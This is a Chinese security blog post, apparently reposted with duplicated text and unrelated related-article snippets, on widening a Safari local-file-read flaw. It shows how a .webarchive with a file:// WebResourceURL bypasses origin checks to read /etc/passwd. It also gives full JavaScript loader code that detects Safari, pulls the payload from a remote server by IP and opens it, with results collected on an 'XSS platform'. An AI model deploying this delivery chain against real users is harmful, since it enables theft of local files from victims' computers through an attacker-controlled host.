Safari访问本地html,safari本地文件读取漏洞之扩展攻击面 | CN-SEC 中文网

最新推荐文章于 2023-05-12 15:18:13 发布
最新推荐文章于 2023-05-12 15:18:13 发布
阅读量472 收藏
点赞数
文章标签: Safari访问本地html

摘要

这样就可以绕过对文件源的检测。 本地测试一下,成功x到/etc/passwd的内容。

但是在mac下运行的时候会弹出安全提示,而且这个后缀名不是很常见,有没有更好的办法呢?

经过测试发现刚下载好的.webarchive 文件,在safari用file协议直接打开是可以运行的,而且没有安全提示。

于是思路就有了:

构造一个html文件,首先在远程服务器下载webarchive文件,利用js location跳转到该文件,即可执行poc。(有缺点:webarchive文件绝对路径因为用户名的关系不固定,但是如果使用mac一般都是下载到同一个文件里,用相对路径即可)

js文件:

function myBrowser(){ var userAgent = navigator.userAgent; var isOpera = userAgent.indexOf("Opera") > -1; if (isOpera) { return "Opera" }; if (userAgent.indexOf("Firefox") > -1) { return "FF"; } if (userAgent.indexOf("Chrome") > -1){ return "Chrome"; } if (userAgent.indexOf("Safari") > -1) { return "Safari"; } if (userAgent.indexOf("compatible") > -1 && userAgent.indexOf("MSIE") > -1 && !isOpera) { return "IE"; }; } function exp(){ var iframe2 = document.createElement('iframe'); iframe2.src="./test.webarchive"; document.body.appendChild(iframe2); // setTimeout("location.reload()",1000); } var mb = myBrowser(); if (mb == "Safari") { var iframe = document.createElement('iframe'); iframe.src="http://123.206.216.198/down.php"; document.body.appendChild(iframe); setTimeout("exp()",1500); } else { document.write('Please use Safari 47acaa29174bc361b920b006898d3261.png to open the html file') } down.php

近几日爆出了safari对本地html文件js处理不当,导致可以读取本地文件

https://lab.wallarm.com/hunting-the-files-34caa0c1496

发现漏洞还是比较鸡肋的,因为safari会识别html文件的来源,一般的网络传输都会给加上来源信息,这样safari就不会在xhr使用file读取本地文件。

作者给出了exp以及利用方法:使用u盘等硬媒介传输,或者使用应用层以下的协议传输,比如telegram的文件传输功能。

https://github.com/Bo0oM/Safiler

但是有没有办法抹除或不添加来源信息呢?

1. 可以使用压缩包打包poc文件,这样添加来源头的是压缩文件,而不是内部文件, 就可以直接执行poc。(但是这样显得比较臃肿)

2. 想办法构造与file协议同源。

我们发现其实作者已经提到了一点,但是没有更好的利用到,.webarchive 文件,里面是xml的结构,只能由safari进行解析,其中里面的WebResourceURL属性,safari将其识别为当前资源所使用的协议,也就是我们可以在这里构造file://

这样就可以绕过对文件源的检测。

3a6dd396ebb838229c1887813572f88a.png

本地测试一下,成功x到/etc/passwd的内容。

但是在mac下运行的时候会弹出安全提示,而且这个后缀名不是很常见,有没有更好的办法呢?

经过测试发现刚下载好的.webarchive 文件,在safari用file协议直接打开是可以运行的,而且没有安全提示。

于是思路就有了:

构造一个html文件,首先在远程服务器下载webarchive文件,利用js location跳转到该文件,即可执行poc。(有缺点:webarchive文件绝对路径因为用户名的关系不固定,但是如果使用mac一般都是下载到同一个文件里,用相对路径即可)

js文件:

function myBrowser(){ var userAgent = navigator.userAgent; var isOpera = userAgent.indexOf("Opera") > -1; if (isOpera) { return "Opera" }; if (userAgent.indexOf("Firefox") > -1) { return "FF"; } if (userAgent.indexOf("Chrome") > -1){ return "Chrome"; } if (userAgent.indexOf("Safari") > -1) { return "Safari"; } if (userAgent.indexOf("compatible") > -1 && userAgent.indexOf("MSIE") > -1 && !isOpera) { return "IE"; }; } function exp(){ var iframe2 = document.createElement('iframe'); iframe2.src="./test.webarchive"; document.body.appendChild(iframe2); // setTimeout("location.reload()",1000); } var mb = myBrowser(); if (mb == "Safari") { var iframe = document.createElement('iframe'); iframe.src="http://123.206.216.198/down.php"; document.body.appendChild(iframe); setTimeout("exp()",1500); } else { document.write('Please use Safari 47acaa29174bc361b920b006898d3261.png to open the html file') }

down.php

最终的html:

test hahaha

58405d1ce426bdca71dd1e82efa24532.png

用safari打开后

93fdd838394691325f1344a5db8a5c72.png

看一下xss平台:

5e3141361429df64d0926f5c50e35017.png

肖狡售
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
关于使用文本编辑的html文件无法于Safari上运行的解决
m0_56208419的博客
10-16 2322
Windows上一样的代码直接运行,Mac上却只有源代码或是空白网页 主要有两方面的原因导致,大家可以按照我以下的说明进行尝试 一.文本编辑的设置 在访达-应用程序中找到文本编辑后,打开; 电脑最上侧,选择文件-新建,见下图; 随后选择格式-制作纯文本,见下图; 接下来到了设置的部分,选择文本编辑-偏好设置,见下图; 会看到这个界面,选择窗口中的“打开与储存”,选中将HTML文件显示为HTML代码而不显示为格式化的文本,再取消选择第三行“给纯文本添加txt扩展名”完...
ios运行html游戏,Objective-c / iOS – 使用Safari打开本地html文件
weixin_30486717的博客
05-30 529
我有一个HTML文件保存在一个临时目录中,如下所示:NSFileManager *fileManager = [NSFileManager defaultManager];NSString *documentDirectory = NSTemporaryDirectory();NSString *documentPath = [documentDirectory stringByAppending...
html文件safari打开方式,在html打开(在Safari中)
weixin_39793420的博客
07-01 1706
嗯,你说的是UIDocumentInteractionController那么。实施UIDocumentInteractionControllerDelegate在UIViewController- (UIViewController *)documentInteractionControllerViewControllerForPreview:(UIDocumentInteractionCont...
ipad safari php readfile mp4,safari本地文件读取漏洞扩展攻击面
weixin_39939668的博客
03-23 78
近几日爆出了safari对本地html文件js处理不当,导致可以读取本地文件发现漏洞还是比较鸡肋的,因为safari会识别html文件的来源,一般的网络传输都会给加上来源信息,这样safari就不会在xhr使用file读取本地文件。作者给出了exp以及利用方法:使用u盘等硬媒介传输,或者使用应用层以下的协议传输,比如telegram的文件传输功能。但是有没有办法抹除或不添加来源信息呢?1. 可以使...
读取本地josn文件_攻击者是如何利用SSRF漏洞读取本地文件并滥用AWS元数据的
weixin_36322454的博客
01-13 241
漏洞简介首先,我抓取并手动执行了该应用程序上的所有用户操作。之后,我通过burp检查了http历史记录中的所有的请求,坦率的说我当时想要挖掘url重定向漏洞。所以,我通过Burp搜索了url=所有可能的参数,并最终发现了一个如下所示的网址:https://example.com/viewimage/?url=AWS图像位置(该图像存储在AWS,所以需要从这里加载)实际上,这个端点就是用...
Python-Safari本地文件读取
08-10
Python-Safari本地文件读取器是一个用于在Python环境中读取Safari浏览器的本地书签、历史记录和其他数据的工具。这个工具可能对开发者或者数据分析人员非常有用,特别是那些需要处理浏览器数据的人。以下是对该主题...
safari下载文件自动加了html后缀问题
12-18
标题中的问题涉及到的是Safari浏览器在下载文件时遇到的一个特定问题,即文件自动添加了HTML后缀。这通常是由于浏览器对文件类型识别错误或者HTTP响应头设置不正确导致的。在描述中,提供了两种下载文件的方法,并且...
refined-github:Safari扩展程序,可简化GitHub界面并添加有用的功能
05-26
完善的Safari的GitHub 浏览器扩展,简化了GitHub界面并添加了有用的功能 这是的Safari版本。 安装 或者 发展 在开始之前,应检出git submodule update --init ( git submodule update --init ),并应安装 。 ...
Cookie-Editor:Safari的Cookie编辑器扩展
03-21
这将在Safari顶部菜单栏中显示一个“开发”选项,以便开发者可以直接访问和管理扩展。 4. **允许未签名的扩展**: 默认情况下,Safari仅允许来自Mac App Store或已信任开发者的应用和扩展运行。为了测试和安装未...
苹果Safari怎么打开html,苹果内置safari浏览器怎么用?safari浏览器详细使用教程...
weixin_32252533的博客
06-26 6915
要说苹果设备上最好用的浏览器,不管是iPhone、iPad还是MacBook,那一定非Safari莫属,iPad 搭载的是Safari浏览器,大触摸屏可以方便冲浪,整个页面可以一次呈现,通过手指在屏幕上便可进行翻页、滚动,也可对相片进行放大缩小操作,支持网页 缩略,体验更为直观。在Safari中找到页面右下角的标签按钮,在长按中间的「+」号就可以看到刚刚关闭的网页。长按浏览器下方的书签按钮,可以快...
safari html5 插件说明
01-25
ClickToPluginForChina ClickToPlugin Marc Hoyois, http://hoyois.github.io/safariextensions/ clicktoplugin/ , N Hoyois
ios手机Safari本地服务连不上
weixin_30293135的博客
03-21 296
问题: 今天在本地起服务准备测下ios手机端页面,结果发现:页面可以打开,但是登录不上。 用alert定位了下,await fn() 报错被try()catch(){}捕获了。。。 原因: 该机子不支持最新js标准 解决方案: 第一步:打开iphone手机的开发者模式,流程是:【设置】->【Safari】->【高级】-> 开启【JavaScript】 ...
【渗透测试基础】文件读取
javaEE_zero的博客
12-16 398
文件读取文件包含
前端开发必须要会的:macos启动一个本地web服务器访问本地html文件并在手机访问html文件
最新发布
国企程序媛 record 前端技术 & review code。。。
05-12 1114
前端启动一个本地web服务器访问html页面
safari怎么修改html,html –  , ,  Safari浏览器的替代品
weixin_39931101的博客
06-03 196
这可能是一个字体问题;它可能有助于指定包含所用固定宽度空格的字形的字体.大多数字体缺少它们.好的浏览器不需要字形,而是增加其他字符之间的间距.但是,更强大的方法是使用CSS技术来添加间距,主要是填充属性,以及对于所有字母之间需要特定间距的文本运行,字母间距属性.使用后者,请注意它也会在最后一个字符后添加间距.我在Unicode spaces上的页面显示了“固定宽度空间”的定义或典型宽度,例如THI...
WebDriver异常
weixin_30611509的博客
04-21 116
NoSuchElementException Solutions: ​ 1. Check the locator of your target element. ​ 2. If the locator is current. Try to wait for page load before find element. 3. If already wait ...
Safari如何查看网页HTML源码
Tech Rose Garden
06-03 896
Jennifer Kyrnin, How to View HTML Source in Safari, 2019-11-27 【转注】在Safari Preferences/Advanced, 勾选Show Develop menu in menu bar。 然后,Develop/Show Page Source。
safari html5插件安装,Safari巧用小插件 体验不输第三方浏览器
weixin_33968957的博客
06-17 457
想必大家平常应该很少使用Safari浏览器,一般都会在手机上下载第三方浏览器来使用,虽然Safari一直在优化但却不及第三方的浏览器来的方便以及用着总有点不顺手。没关系,本篇文章将为您介绍巧妙的装一些小插件,使用起来完全不输第三方浏览器,有兴趣的话不妨跟着一起动手实践一下!网页截图涂鸦一般在使用网页截图的话,一般都是通过 Home 键 加 电源键实现快速截图。「 Awesome Screensho...
safari如何打开html文件,如何通过safari Web浏览器和Python3有效地查看数百个本地html文件...
weixin_42314420的博客
06-20 555
这实际上似乎是一个可以在本地运行的小型Bokeh服务器应用程序的完美用例。您可以将代码放在文件app.py中,然后在命令行运行bokeh serve --show app.py。import numpy as npfrom bokeh.io import curdocfrom bokeh.models import Button, ColumnDataSource, TextInputfrom b...
文件操作安全之-文件读取原理篇
村中少年的专栏
10-31 1027
文件读取的定义,文件读取漏洞原理,文件读取漏洞的具体案例,例如Jenkins CVE-2018-1999002 和gitlab CVE-2016-9086文件解析漏洞,以及文件读取漏洞潜在的危害阐述文件读取漏洞中的安全问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值